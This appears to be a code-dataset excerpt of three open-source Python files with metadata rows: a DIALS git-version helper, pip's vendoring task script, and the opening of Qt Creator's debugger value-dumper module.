pass # This is not supported on older git versions < 1.8.4.
if version is None:
# Find the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long"], cwd=dials_path, stderr=devnull
)
.rstrip()
.decode("latin-1")
)
if treat_merges_as_single_commit:
tag = version[: version.rindex("-", 0, version.rindex("-"))]
commit = version[version.rindex("-") + 1 :] # 'gxxxxxxx'
# Now find the first-parent-path
depth = subprocess.check_output(
["git", "rev-list", f"{tag}..HEAD", "--first-parent"],
cwd=dials_path,
stderr=devnull,
).rstrip()
if depth:
depth = depth.strip().count("\n") + 1
else:
depth = 0
version = "%s-%d-%s" % (tag, depth, commit)
# Turn descriptive version string into proper version number
if version[0] == "v":
version = version[1:].replace(".0-", "-")
version = version.replace("-", ".", 1)
# If we are on a release branch, then append a '-release'-tag
if releasebranch:
version = version + "-release"
return str(version)
# When run from a development installation the version information is extracted
# from the git repository. Otherwise it is read from the file '.gitversion' in the
# DIALS module directory.
def dials_version():
"""Try to obtain the current git revision number
and store a copy in .gitversion"""
version = None
try:
import os
dials_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
version_file = os.path.join(dials_path, ".gitversion")
# 1. Try to access information in .git directory
# Regenerate .gitversion if possible
if not os.environ.get("DIALS_SKIP_GIT_VERSIONING") and os.path.exists(
os.path.join(dials_path, ".git")
):
try:
version = get_git_version(dials_path)
with open(version_file, "w") as gv:
gv.write(version)
except Exception:
if version == "":
version = None
# 2. If .git directory missing or 'git describe' failed, read .gitversion
if (version is None) and os.path.exists(version_file):
with open(version_file) as gv:
version = gv.read().rstrip()
except Exception:
pass
if version is None:
version = __dials_version_format % __dials_version_default
else:
version = __dials_version_format % version
return version
|
bsd-3-clause
| 3,118,716,970,657,075,000
| 35.967213
| 106
| 0.531486
| false
| 4.278937
| false
| false
| false
|
sigmavirus24/pip
|
tasks/vendoring/__init__.py
|
1
|
3688
|
""""Vendoring script, python 3.5 needed"""
from pathlib import Path
import re
import shutil
import invoke
TASK_NAME = 'update'
FILE_WHITE_LIST = (
'Makefile',
'vendor.txt',
'__init__.py',
'README.rst',
)
def drop_dir(path):
shutil.rmtree(str(path))
def remove_all(paths):
for path in paths:
if path.is_dir():
drop_dir(path)
else:
path.unlink()
def log(msg):
print('[vendoring.%s] %s' % (TASK_NAME, msg))
def clean_vendor(ctx, vendor_dir):
# Old _vendor cleanup
remove_all(vendor_dir.glob('*.pyc'))
log('Cleaning %s' % vendor_dir)
for item in vendor_dir.iterdir():
if item.is_dir():
shutil.rmtree(str(item))
elif item.name not in FILE_WHITE_LIST:
item.unlink()
else:
log('Skipping %s' % item)
def rewrite_imports(package_dir, vendored_libs):
for item in package_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
elif item.name.endswith('.py'):
rewrite_file_imports(item, vendored_libs)
def rewrite_file_imports(item, vendored_libs):
"""Rewrite 'import xxx' and 'from xxx import' for vendored_libs"""
text = item.read_text()
# Revendor pkg_resources.extern first
text = re.sub(r'pkg_resources.extern', r'pip._vendor', text)
for lib in vendored_libs:
text = re.sub(
r'(\n\s*)import %s' % lib,
r'\1from pip._vendor import %s' % lib,
text,
)
text = re.sub(
r'(\n\s*)from %s' % lib,
r'\1from pip._vendor.%s' % lib,
text,
)
item.write_text(text)
def apply_patch(ctx, patch_file_path):
log('Applying patch %s' % patch_file_path.name)
ctx.run('git apply %s' % patch_file_path)
def vendor(ctx, vendor_dir):
log('Reinstalling vendored libraries')
ctx.run(
'pip install -t {0} -r {0}/vendor.txt --no-compile'.format(
str(vendor_dir),
)
)
remove_all(vendor_dir.glob('*.dist-info'))
remove_all(vendor_dir.glob('*.egg-info'))
# Cleanup setuptools unneeded parts
(vendor_dir / 'easy_install.py').unlink()
drop_dir(vendor_dir / 'setuptools')
drop_dir(vendor_dir / 'pkg_resources' / '_vendor')
drop_dir(vendor_dir / 'pkg_resources' / 'extern')
# Drop interpreter and OS specific msgpack libs.
# Pip will rely on the python-only fallback instead.
remove_all(vendor_dir.glob('msgpack/*.so'))
# Detect the vendored packages/modules
vendored_libs = []
for item in vendor_dir.iterdir():
if item.is_dir():
vendored_libs.append(item.name)
elif item.name not in FILE_WHITE_LIST:
vendored_libs.append(item.name[:-3])
log("Detected vendored libraries: %s" % ", ".join(vendored_libs))
# Global import rewrites
log("Rewriting all imports related to vendored libs")
for item in vendor_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
elif item.name not in FILE_WHITE_LIST:
rewrite_file_imports(item, vendored_libs)
# Special cases: apply stored patches
log("Apply patches")
patch_dir = Path(__file__).parent / 'patches'
for patch in patch_dir.glob('*.patch'):
apply_patch(ctx, patch)
@invoke.task(name=TASK_NAME)
def main(ctx):
git_root = Path(
ctx.run('git rev-parse --show-toplevel', hide=True).stdout.strip()
)
vendor_dir = git_root / 'pip' / '_vendor'
log('Using vendor dir: %s' % vendor_dir)
clean_vendor(ctx, vendor_dir)
vendor(ctx, vendor_dir)
log('Revendoring complete')
|
mit
| 8,446,935,301,462,685,000
| 26.729323
| 74
| 0.594902
| false
| 3.325518
| false
| false
| false
|
pivonroll/Qt_Creator
|
share/qtcreator/debugger/dumper.py
|
1
|
74430
|
############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import os
import struct
import sys
import base64
import re
import time
import json
import inspect
if sys.version_info[0] >= 3:
xrange = range
toInteger = int
else:
toInteger = long
verbosity = 0
verbosity = 1
# Debugger start modes. Keep in sync with DebuggerStartMode in debuggerconstants.h
NoStartMode, \
StartInternal, \
StartExternal, \
AttachExternal, \
AttachCrashedExternal, \
AttachCore, \
AttachToRemoteServer, \
AttachToRemoteProcess, \
StartRemoteProcess, \
= range(0, 9)
# Known special formats. Keep in sync with DisplayFormat in debuggerprotocol.h
AutomaticFormat, \
RawFormat, \
SimpleFormat, \
EnhancedFormat, \
SeparateFormat, \
Latin1StringFormat, \
SeparateLatin1StringFormat, \
Utf8StringFormat, \
SeparateUtf8StringFormat, \
Local8BitStringFormat, \
Utf16StringFormat, \
Ucs4StringFormat, \
Array10Format, \
Array100Format, \
Array1000Format, \
Array10000Format, \
ArrayPlotFormat, \
CompactMapFormat, \
DirectQListStorageFormat, \
IndirectQListStorageFormat, \
= range(0, 20)
# Breakpoints. Keep synchronized with BreakpointType in breakpoint.h
UnknownType, \
BreakpointByFileAndLine, \
BreakpointByFunction, \
BreakpointByAddress, \
BreakpointAtThrow, \
BreakpointAtCatch, \
BreakpointAtMain, \
BreakpointAtFork, \
BreakpointAtExec, \
BreakpointAtSysCall, \
WatchpointAtAddress, \
WatchpointAtExpression, \
BreakpointOnQmlSignalEmit, \
BreakpointAtJavaScriptThrow, \
= range(0, 14)
def arrayForms():
return [ArrayPlotFormat]
def mapForms():
return [CompactMapFormat]
class ReportItem:
"""
Helper structure to keep temporary "best" information about a value
or a type scheduled to be reported. This might get overridden be
subsequent better guesses during a putItem() run.
"""
def __init__(self, value = None, encoding = None, priority = -100, elided = None):
self.value = value
self.priority = priority
self.encoding = encoding
self.elided = elided
def __str__(self):
return "Item(value: %s, encoding: %s, priority: %s, elided: %s)" \
% (self.value, self.encoding, self.priority, self.elided)
class Blob(object):
"""
Helper structure to keep a blob of bytes, possibly
in the inferior.
"""
def __init__(self, data, isComplete = True):
self.data = data
self.size = len(data)
self.isComplete = isComplete
def size(self):
return self.size
def toBytes(self):
"""Retrieves "lazy" contents from memoryviews."""
data = self.data
major = sys.version_info[0]
if major == 3 or (major == 2 and sys.version_info[1] >= 7):
if isinstance(data, memoryview):
data = data.tobytes()
if major == 2 and isinstance(data, buffer):
data = ''.join([c for c in data])
return data
def toString(self):
data = self.toBytes()
return data if sys.version_info[0] == 2 else data.decode("utf8")
def extractByte(self, offset = 0):
return struct.unpack_from("b", self.data, offset)[0]
def extractShort(self, offset = 0):
return struct.unpack_from("h", self.data, offset)[0]
def extractUShort(self, offset = 0):
return struct.unpack_from("H", self.data, offset)[0]
def extractInt(self, offset = 0):
return struct.unpack_from("i", self.data, offset)[0]
def extractUInt(self, offset = 0):
return struct.unpack_from("I", self.data, offset)[0]
def extractLong(self, offset = 0):
return struct.unpack_from("l", self.data, offset)[0]
# FIXME: Note these should take target architecture into account.
def extractULong(self, offset = 0):
return struct.unpack_from("L", self.data, offset)[0]
def extractInt64(self, offset = 0):
return struct.unpack_from("q", self.data, offset)[0]
def extractUInt64(self, offset = 0):
return struct.unpack_from("Q", self.data, offset)[0]
def extractDouble(self, offset = 0):
return struct.unpack_from("d", self.data, offset)[0]
def extractFloat(self, offset = 0):
return struct.unpack_from("f", self.data, offset)[0]
def warn(message):
print('bridgemessage={msg="%s"},' % message.replace('"', '$').encode("latin1"))
def showException(msg, exType, exValue, exTraceback):
warn("**** CAUGHT EXCEPTION: %s ****" % msg)
try:
import traceback
for line in traceback.format_exception(exType, exValue, exTraceback):
warn("%s" % line)
except:
pass
class Children:
def __init__(self, d, numChild = 1, childType = None, childNumChild = None,
maxNumChild = None, addrBase = None, addrStep = None):
self.d = d
self.numChild = numChild
self.childNumChild = childNumChild
self.maxNumChild = maxNumChild
self.addrBase = addrBase
self.addrStep = addrStep
self.printsAddress = True
if childType is None:
self.childType = None
else:
self.childType = d.stripClassTag(str(childType))
if not self.d.isCli:
self.d.put('childtype="%s",' % self.childType)
if childNumChild is None:
pass
#if self.d.isSimpleType(childType):
# self.d.put('childnumchild="0",')
# self.childNumChild = 0
#elif childType.code == PointerCode:
# self.d.put('childnumchild="1",')
# self.childNumChild = 1
else:
self.d.put('childnumchild="%s",' % childNumChild)
self.childNumChild = childNumChild
self.printsAddress = not self.d.putAddressRange(addrBase, addrStep)
def __enter__(self):
self.savedChildType = self.d.currentChildType
self.savedChildNumChild = self.d.currentChildNumChild
self.savedNumChild = self.d.currentNumChild
self.savedMaxNumChild = self.d.currentMaxNumChild
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentChildType = self.childType
self.d.currentChildNumChild = self.childNumChild
self.d.currentNumChild = self.numChild
self.d.currentMaxNumChild = self.maxNumChild
self.d.currentPrintsAddress = self.printsAddress
self.d.put(self.d.childrenPrefix)
def __exit__(self, exType, exValue, exTraceBack):
if not exType is None:
if self.d.passExceptions:
showException("CHILDREN", exType, exValue, exTraceBack)
self.d.putNumChild(0)
self.d.putSpecialValue("notaccessible")
if not self.d.currentMaxNumChild is None:
if self.d.currentMaxNumChild < self.d.currentNumChild:
self.d.put('{name="<incomplete>",value="",type="",numchild="0"},')
self.d.currentChildType = self.savedChildType
self.d.currentChildNumChild = self.savedChildNumChild
self.d.currentNumChild = self.savedNumChild
self.d.currentMaxNumChild = self.savedMaxNumChild
self.d.currentPrintsAddress = self.savedPrintsAddress
self.d.putNewline()
self.d.put(self.d.childrenSuffix)
return True
class PairedChildrenData:
def __init__(self, d, pairType, keyType, valueType, useKeyAndValue):
self.useKeyAndValue = useKeyAndValue
self.pairType = pairType
self.keyType = keyType
self.valueType = valueType
self.isCompact = d.isMapCompact(self.keyType, self.valueType)
self.childType = valueType if self.isCompact else pairType
ns = d.qtNamespace()
keyTypeName = d.stripClassTag(str(self.keyType))
self.keyIsQString = keyTypeName == ns + "QString"
self.keyIsQByteArray = keyTypeName == ns + "QByteArray"
self.keyIsStdString = keyTypeName == "std::string" \
or keyTypeName.startswith("std::basic_string<char")
class PairedChildren(Children):
def __init__(self, d, numChild, useKeyAndValue = False,
pairType = None, keyType = None, valueType = None, maxNumChild = None):
self.d = d
if keyType is None:
keyType = d.templateArgument(pairType, 0).unqualified()
if valueType is None:
valueType = d.templateArgument(pairType, 1)
d.pairData = PairedChildrenData(d, pairType, keyType, valueType, useKeyAndValue)
Children.__init__(self, d, numChild,
d.pairData.childType,
maxNumChild = maxNumChild,
addrBase = None, addrStep = None)
def __enter__(self):
self.savedPairData = self.d.pairData if hasattr(self.d, "pairData") else None
Children.__enter__(self)
def __exit__(self, exType, exValue, exTraceBack):
Children.__exit__(self, exType, exValue, exTraceBack)
self.d.pairData = self.savedPairData if self.savedPairData else None
class SubItem:
def __init__(self, d, component):
self.d = d
self.name = component
self.iname = None
def __enter__(self):
self.d.enterSubItem(self)
def __exit__(self, exType, exValue, exTraceBack):
return self.d.exitSubItem(self, exType, exValue, exTraceBack)
class NoAddress:
def __init__(self, d):
self.d = d
def __enter__(self):
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentPrintsAddress = False
def __exit__(self, exType, exValue, exTraceBack):
self.d.currentPrintsAddress = self.savedPrintsAddress
class TopLevelItem(SubItem):
def __init__(self, d, iname):
self.d = d
self.iname = iname
self.name = None
class UnnamedSubItem(SubItem):
def __init__(self, d, component):
self.d = d
self.iname = "%s.%s" % (self.d.currentIName, component)
self.name = None
class DumperBase:
def __init__(self):
self.isCdb = False
self.isGdb = False
self.isLldb = False
self.isCli = False
# Later set, or not set:
self.stringCutOff = 10000
self.displayStringLimit = 100
self.resetCaches()
self.childrenPrefix = 'children=['
self.childrenSuffix = '],'
self.dumpermodules = [
"qttypes",
"stdtypes",
"misctypes",
"boosttypes",
"creatortypes",
"personaltypes",
]
def resetCaches(self):
# This is a cache mapping from 'type name' to 'display alternatives'.
self.qqFormats = { "QVariant (QVariantMap)" : mapForms() }
# This is a cache of all known dumpers.
self.qqDumpers = {} # Direct type match
self.qqDumpersEx = {} # Using regexp
# This is a cache of all dumpers that support writing.
self.qqEditable = {}
# This keeps canonical forms of the typenames, without array indices etc.
self.cachedFormats = {}
# Maps type names to static metaobjects. If a type is known
# to not be QObject derived, it contains a 0 value.
self.knownStaticMetaObjects = {}
def putNewline(self):
pass
def stripClassTag(self, typeName):
if typeName.startswith("class "):
return typeName[6:]
if typeName.startswith("struct "):
return typeName[7:]
if typeName.startswith("const "):
return typeName[6:]
if typeName.startswith("volatile "):
return typeName[9:]
return typeName
def stripForFormat(self, typeName):
if typeName in self.cachedFormats:
return self.cachedFormats[typeName]
stripped = ""
inArray = 0
for c in self.stripClassTag(typeName):
if c == '<':
break
if c == ' ':
continue
if c == '[':
inArray += 1
elif c == ']':
inArray -= 1
if inArray and ord(c) >= 48 and ord(c) <= 57:
continue
stripped += c
self.cachedFormats[typeName] = stripped
return stripped
# Hex decoding operating on str, return str.
def hexdecode(self, s):
if sys.version_info[0] == 2:
return s.decode("hex")
return bytes.fromhex(s).decode("utf8")
# Hex encoding operating on str or bytes, return str.
def hexencode(self, s):
if s is None:
s = ''
if sys.version_info[0] == 2:
return s.encode("hex")
if isinstance(s, str):
s = s.encode("utf8")
return base64.b16encode(s).decode("utf8")
#def toBlob(self, value):
# """Abstract"""
def is32bit(self):
return self.ptrSize() == 4
def is64bit(self):
return self.ptrSize() == 8
def isQt3Support(self):
# assume no Qt 3 support by default
return False
def lookupQtType(self, typeName):
return self.lookupType(self.qtNamespace() + typeName)
# Clamps size to limit.
def computeLimit(self, size, limit):
if limit == 0:
limit = self.displayStringLimit
if limit is None or size <= limit:
return 0, size
return size, limit
def vectorDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
else:
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = addr + 16
return data, size, alloc
def byteArrayDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
# QTypedArray:
# - QtPrivate::RefCount ref
# - int size
# - uint alloc : 31, capacityReserved : 1
# - qptrdiff offset
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
if self.ptrSize() == 4:
data = data & 0xffffffff
else:
data = data & 0xffffffffffffffff
elif self.qtVersion() >= 0x040000:
# Data:
# - QBasicAtomicInt ref;
# - int alloc, size;
# - [padding]
# - char *data;
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = self.extractPointer(addr + 8 + self.ptrSize())
else:
# Data:
# - QShared count;
# - QChar *unicode
# - char *ascii
# - uint len: 30
size = self.extractInt(addr + 3 * self.ptrSize()) & 0x3ffffff
alloc = size # pretend.
data = self.extractPointer(addr + self.ptrSize())
return data, size, alloc
# addr is the begin of a QByteArrayData structure
def encodeStringHelper(self, addr, limit):
# Should not happen, but we get it with LLDB as result
# of inferior calls
if addr == 0:
return 0, ""
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, 2 * shown)
def encodeByteArrayHelper(self, addr, limit):
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, shown)
def putCharArrayHelper(self, data, size, charSize,
displayFormat = AutomaticFormat,
makeExpandable = True):
bytelen = size * charSize
elided, shown = self.computeLimit(bytelen, self.displayStringLimit)
mem = self.readMemory(data, shown)
if charSize == 1:
if displayFormat == Latin1StringFormat \
or displayFormat == SeparateLatin1StringFormat:
encodingType = "latin1"
else:
encodingType = "utf8"
childType = "char"
elif charSize == 2:
encodingType = "utf16"
childType = "short"
else:
encodingType = "ucs4"
childType = "int"
self.putValue(mem, encodingType, elided=elided)
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat \
or displayFormat == SeparateFormat:
elided, shown = self.computeLimit(bytelen, 100000)
self.putDisplay(encodingType + ':separate', self.readMemory(data, shown))
if makeExpandable:
self.putNumChild(size)
if self.isExpanded():
with Children(self):
for i in range(size):
self.putSubItem(size, data[i])
def readMemory(self, addr, size):
data = self.extractBlob(addr, size).toBytes()
return self.hexencode(data)
def encodeByteArray(self, value, limit = 0):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), limit)
return data
def byteArrayData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def putByteArrayValue(self, value):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), self.displayStringLimit)
self.putValue(data, "latin1", elided=elided)
def encodeString(self, value, limit = 0):
elided, data = self.encodeStringHelper(self.extractPointer(value), limit)
return data
def encodedUtf16ToUtf8(self, s):
return ''.join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 4)])
def encodeStringUtf8(self, value, limit = 0):
return self.encodedUtf16ToUtf8(self.encodeString(value, limit))
def stringData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def encodeStdString(self, value, limit = 0):
data = value["_M_dataplus"]["_M_p"]
sizePtr = data.cast(self.sizetType().pointer())
size = int(sizePtr[-3])
alloc = int(sizePtr[-2])
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return self.readMemory(data, shown)
def extractTemplateArgument(self, typename, position):
level = 0
skipSpace = False
inner = ''
for c in typename[typename.find('<') + 1 : -1]:
if c == '<':
inner += c
level += 1
elif c == '>':
level -= 1
inner += c
elif c == ',':
if level == 0:
if position == 0:
return inner.strip()
position -= 1
inner = ''
else:
inner += c
skipSpace = True
else:
if skipSpace and c == ' ':
pass
else:
inner += c
skipSpace = False
# Handle local struct definitions like QList<main(int, char**)::SomeStruct>
inner = inner.strip()
p = inner.find(')::')
if p > -1:
inner = inner[p+3:]
return inner
def putStringValueByAddress(self, addr):
elided, data = self.encodeStringHelper(addr, self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putStringValue(self, value):
elided, data = self.encodeStringHelper(
self.extractPointer(value),
self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putAddressItem(self, name, value, type = ""):
with SubItem(self, name):
self.putValue("0x%x" % value)
self.putType(type)
self.putNumChild(0)
def putIntItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("int")
self.putNumChild(0)
def putBoolItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("bool")
self.putNumChild(0)
def putGenericItem(self, name, type, value, encoding = None):
with SubItem(self, name):
self.putValue(value, encoding)
self.putType(type)
self.putNumChild(0)
def putCallItem(self, name, value, func, *args):
try:
result = self.callHelper(value, func, args)
with SubItem(self, name):
self.putItem(result)
except:
with SubItem(self, name):
self.putSpecialValue("notcallable");
self.putNumChild(0)
def call(self, value, func, *args):
return self.callHelper(value, func, args)
def putAddressRange(self, base, step):
try:
if not addrBase is None and not step is None:
self.put('addrbase="0x%x",' % toInteger(base))
self.put('addrstep="0x%x",' % toInteger(step))
return True
except:
#warn("ADDRBASE: %s" % base)
#warn("ADDRSTEP: %s" % step)
pass
return False
def putMapName(self, value, index = None):
ns = self.qtNamespace()
typeName = self.stripClassTag(str(value.type))
if typeName == ns + "QString":
self.put('keyencoded="utf16:2:0",key="%s",' % self.encodeString(value))
elif typeName == ns + "QByteArray":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeByteArray(value))
elif typeName == "std::string":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeStdString(value))
else:
val = str(value.GetValue()) if self.isLldb else str(value)
if index is None:
key = '%s' % val
else:
key = '[%s] %s' % (index, val)
self.put('keyencoded="utf8:1:0",key="%s",' % self.hexencode(key))
def putPair(self, pair, index = None):
if self.pairData.useKeyAndValue:
key = pair["key"]
value = pair["value"]
else:
key = pair["first"]
value = pair["second"]
if self.pairData.isCompact:
if self.pairData.keyIsQString:
self.put('keyencoded="utf16",key="%s",' % self.encodeString(key))
elif self.pairData.keyIsQByteArray:
self.put('keyencoded="latin1",key="%s",' % self.encodeByteArray(key))
elif self.pairData.keyIsStdString:
self.put('keyencoded="latin1",key="%s",' % self.encodeStdString(key))
else:
name = str(key.GetValue()) if self.isLldb else str(key)
if index == -1:
self.put('name="%s",' % name)
else:
self.put('key="[%s] %s",' % (index, name))
self.putItem(value)
else:
self.putEmptyValue()
self.putNumChild(2)
self.putField("iname", self.currentIName)
if self.isExpanded():
with Children(self):
if self.pairData.useKeyAndValue:
self.putSubItem("key", key)
self.putSubItem("value", value)
else:
self.putSubItem("first", key)
self.putSubItem("second", value)
def putPlainChildren(self, value, dumpBase = True):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.isExpanded():
with Children(self):
self.putFields(value, dumpBase)
def isMapCompact(self, keyType, valueType):
if self.currentItemFormat() == CompactMapFormat:
return True
return self.isSimpleType(keyType) and self.isSimpleType(valueType)
def check(self, exp):
if not exp:
raise RuntimeError("Check failed")
def checkRef(self, ref):
count = self.extractInt(ref.address)
# Assume there aren't a million references to any object.
self.check(count >= -1)
self.check(count < 1000000)
def readToFirstZero(self, p, tsize, maximum):
code = (None, "b", "H", None, "I")[tsize]
base = toInteger(p)
blob = self.extractBlob(base, maximum).toBytes()
for i in xrange(0, maximum, tsize):
t = struct.unpack_from(code, blob, i)[0]
if t == 0:
return 0, i, self.hexencode(blob[:i])
# Real end is unknown.
return -1, maximum, self.hexencode(blob[:maximum])
def encodeCArray(self, p, tsize, limit):
elided, shown, blob = self.readToFirstZero(p, tsize, limit)
return elided, blob
def putItemCount(self, count, maximum = 1000000000):
# This needs to override the default value, so don't use 'put' directly.
if count > maximum:
self.putSpecialValue("minimumitemcount", maximum)
else:
self.putSpecialValue("itemcount", count)
self.putNumChild(count)
def resultToMi(self, value):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
return '{' + ','.join(['%s=%s' % (k, self.resultToMi(v))
for (k, v) in list(value.items())]) + '}'
if type(value) is list:
return '[' + ','.join([self.resultToMi(k)
for k in list(value.items())]) + ']'
return '"%s"' % value
def variablesToMi(self, value, prefix):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
pairs = []
for (k, v) in list(value.items()):
if k == 'iname':
if v.startswith('.'):
v = '"%s%s"' % (prefix, v)
else:
v = '"%s"' % v
else:
v = self.variablesToMi(v, prefix)
pairs.append('%s=%s' % (k, v))
return '{' + ','.join(pairs) + '}'
if type(value) is list:
index = 0
pairs = []
for item in value:
if item.get('type', '') == 'function':
continue
name = item.get('name', '')
if len(name) == 0:
name = str(index)
index += 1
pairs.append((name, self.variablesToMi(item, prefix)))
pairs.sort(key = lambda pair: pair[0])
return '[' + ','.join([pair[1] for pair in pairs]) + ']'
return '"%s"' % value
def filterPrefix(self, prefix, items):
return [i[len(prefix):] for i in items if i.startswith(prefix)]
def tryFetchInterpreterVariables(self, args):
if not int(args.get('nativemixed', 0)):
return (False, '')
context = args.get('context', '')
if not len(context):
return (False, '')
expanded = args.get('expanded')
args['expanded'] = self.filterPrefix('local', expanded)
res = self.sendInterpreterRequest('variables', args)
if not res:
return (False, '')
reslist = []
for item in res.get('variables', {}):
if not 'iname' in item:
item['iname'] = '.' + item.get('name')
reslist.append(self.variablesToMi(item, 'local'))
watchers = args.get('watchers', None)
if watchers:
toevaluate = []
name2expr = {}
seq = 0
for watcher in watchers:
expr = self.hexdecode(watcher.get('exp'))
name = str(seq)
toevaluate.append({'name': name, 'expression': expr})
name2expr[name] = expr
seq += 1
args['expressions'] = toevaluate
args['expanded'] = self.filterPrefix('watch', expanded)
del args['watchers']
res = self.sendInterpreterRequest('expressions', args)
if res:
for item in res.get('expressions', {}):
name = item.get('name')
iname = 'watch.' + name
expr = name2expr.get(name)
item['iname'] = iname
item['wname'] = self.hexencode(expr)
item['exp'] = expr
reslist.append(self.variablesToMi(item, 'watch'))
return (True, 'data=[%s]' % ','.join(reslist))
def putField(self, name, value):
self.put('%s="%s",' % (name, value))
def putType(self, type, priority = 0):
# Higher priority values override lower ones.
if priority >= self.currentType.priority:
self.currentType.value = str(type)
self.currentType.priority = priority
def putValue(self, value, encoding = None, priority = 0, elided = None):
# Higher priority values override lower ones.
# elided = 0 indicates all data is available in value,
# otherwise it's the true length.
if priority >= self.currentValue.priority:
self.currentValue = ReportItem(value, encoding, priority, elided)
def putSpecialValue(self, encoding, value = ""):
self.putValue(value, encoding)
def putEmptyValue(self, priority = -10):
if priority >= self.currentValue.priority:
self.currentValue = ReportItem("", None, priority, None)
def putName(self, name):
self.put('name="%s",' % name)
def putBetterType(self, type):
if isinstance(type, ReportItem):
self.currentType.value = str(type.value)
else:
self.currentType.value = str(type)
self.currentType.priority += 1
def putNoType(self):
# FIXME: replace with something that does not need special handling
# in SubItem.__exit__().
self.putBetterType(" ")
def putInaccessible(self):
#self.putBetterType(" ")
self.putNumChild(0)
self.currentValue.value = None
def putNamedSubItem(self, component, value, name):
with SubItem(self, component):
self.putName(name)
self.putItem(value)
def isExpanded(self):
#warn("IS EXPANDED: %s in %s: %s" % (self.currentIName,
# self.expandedINames, self.currentIName in self.expandedINames))
return self.currentIName in self.expandedINames
def putPlainChildren(self, value):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
self.putFields(value)
def putCStyleArray(self, value):
arrayType = value.type.unqualified()
innerType = value[0].type
innerTypeName = str(innerType.unqualified())
ts = innerType.sizeof
try:
self.putValue("@0x%x" % self.addressOf(value), priority = -1)
except:
self.putEmptyValue()
self.putType(arrayType)
try:
p = self.addressOf(value)
except:
p = None
displayFormat = self.currentItemFormat()
arrayByteSize = arrayType.sizeof
if arrayByteSize == 0:
# This should not happen. But it does, see QTCREATORBUG-14755.
# GDB/GCC produce sizeof == 0 for QProcess arr[3]
s = str(value.type)
itemCount = s[s.find('[')+1:s.find(']')]
if not itemCount:
itemCount = '100'
arrayByteSize = int(itemCount) * ts;
n = int(arrayByteSize / ts)
if displayFormat != RawFormat and p:
if innerTypeName == "char" or innerTypeName == "wchar_t":
self.putCharArrayHelper(p, n, ts, self.currentItemFormat(),
makeExpandable = False)
else:
self.tryPutSimpleFormattedPointer(p, arrayType, innerTypeName,
displayFormat, arrayByteSize)
self.putNumChild(n)
if self.isExpanded():
self.putArrayData(p, n, innerType)
self.putPlotDataHelper(p, n, innerType)
def cleanAddress(self, addr):
if addr is None:
return "<no address>"
# We cannot use str(addr) as it yields rubbish for char pointers
# that might trigger Unicode encoding errors.
#return addr.cast(lookupType("void").pointer())
try:
return "0x%x" % toInteger(hex(addr), 16)
except:
warn("CANNOT CONVERT TYPE: %s" % type(addr))
try:
warn("ADDR: %s" % addr)
except:
pass
try:
warn("TYPE: %s" % addr.type)
except:
pass
return str(addr)
def tryPutPrettyItem(self, typeName, value):
if self.useFancy and self.currentItemFormat() != RawFormat:
self.putType(typeName)
nsStrippedType = self.stripNamespaceFromType(typeName)\
.replace("::", "__")
# The following block is only needed for D.
if nsStrippedType.startswith("_A"):
# DMD v2.058 encodes string[] as _Array_uns long long.
# With spaces.
if nsStrippedType.startswith("_Array_"):
qdump_Array(self, value)
return True
if nsStrippedType.startswith("_AArray_"):
qdump_AArray(self, value)
return True
dumper = self.qqDumpers.get(nsStrippedType)
if not dumper is None:
dumper(self, value)
return True
for pattern in self.qqDumpersEx.keys():
dumper = self.qqDumpersEx[pattern]
if re.match(pattern, nsStrippedType):
dumper(self, value)
return True
return False
def putSimpleCharArray(self, base, size = None):
if size is None:
elided, shown, data = self.readToFirstZero(base, 1, self.displayStringLimit)
else:
elided, shown = self.computeLimit(int(size), self.displayStringLimit)
data = self.readMemory(base, shown)
